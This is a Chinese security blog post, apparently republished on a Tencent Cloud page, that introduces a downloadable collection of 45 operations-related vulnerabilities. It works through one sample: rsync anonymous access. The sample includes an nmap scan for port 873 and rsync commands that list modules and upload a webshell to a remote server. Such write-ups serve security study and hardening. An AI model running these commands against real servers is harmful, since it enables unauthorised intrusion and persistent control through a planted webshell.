前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【漏洞赏析】安全运维那些洞

【漏洞赏析】安全运维那些洞

作者头像
aerfa
发布2018-06-12 10:20:59
8230
发布2018-06-12 10:20:59
举报

0x00 缘由

有人说:编程是一种美,是一门艺术,享受其中思维的妙曼身姿,一个有灵魂的程序猿叫做万物的“造物主”;

而我说:漏洞是一种美,是一个世界,畅游于黑暗的世界里探索,一个有个性的白帽子叫做世间的“救世主”。

0x01 概括

不知从何时起,养成了一个喜欢看“漏洞”的习惯,乌云的离开让很多人伤心而遗憾。不知从何时起,养成了一个喜欢记笔记、总结、思考的习惯,于是有了今天这份paper:

或许,很多朋友已经看到过标题,因为之前没有自己的公众号在T00Ls发过,后来又被人转到过爱春秋。现在打算开始尝试公众号,想起是时候把它纳入怀中了。

0x02 结构

这份 paper 没有太多个人思路,但却不失某一漏洞的利用方法及遇到的问题(当时有的没有解决,然而后来也没有继续补充)。仅单纯的按照自己的思路,记录和总结常见的运维相关安全漏洞。难免会有错误与不足(包括不全面)之处,还请大家不吝赐教。

1)很早之前为止,共收集运维相关漏洞45例

2)每例结构分为:基础知识、漏洞利用、实战演练(及修复方案)

以rsync匿名访问为例:

--1 基础知识

rsync 是一个远程数据同步工具,用 “rsync 算法”提供了一个客户机和远程文件服务器的文件同步的快速方法,在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。

下载文件:

./rsync -vzrtopg --progress --delete username@xxx.xxx.xxx.xxx::out /home/test/getfile

上传文件:

/user/bin/rsync -vzrtopg --progress /home/test/getfile username@xxx.xxx.xxx.xxx::out

--2 利用方法

rsync 默认端口是 873,可使用 nmap 进行扫描:

nmap –n –open –p 873 x.x.x.x/24

尝试上传、下载文件( kali 中):rsync 10.210.208.39::

或 rsync –vvvv rsync://10.210.208.39::

--3 实战演练

获取文件信息找到网站目录:# rsync -v xx.xx.xx.xx::

同步本地大马至远程服务器,上传webshell

# rsync -av /root/Desktop/youxiu.aspx xx.xx.xx.xx::Etest

确认是否成功: # rsync -v xx.xx.xx.xx::Etest

获取目标webshell:

3)每例中可能是一类漏洞的集合

比如struts漏洞:

又如web服务器解析漏洞:

0x03 结语

以上漏洞大餐可能时间较久,如果有想继续完善的朋友可以留言。

下载链接如下(下载即同意以上PS中的内容):

链接: https://pan.baidu.com/s/1o8mlfAE 密码: mk4d

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2017-11-30,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 我的安全视界观 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档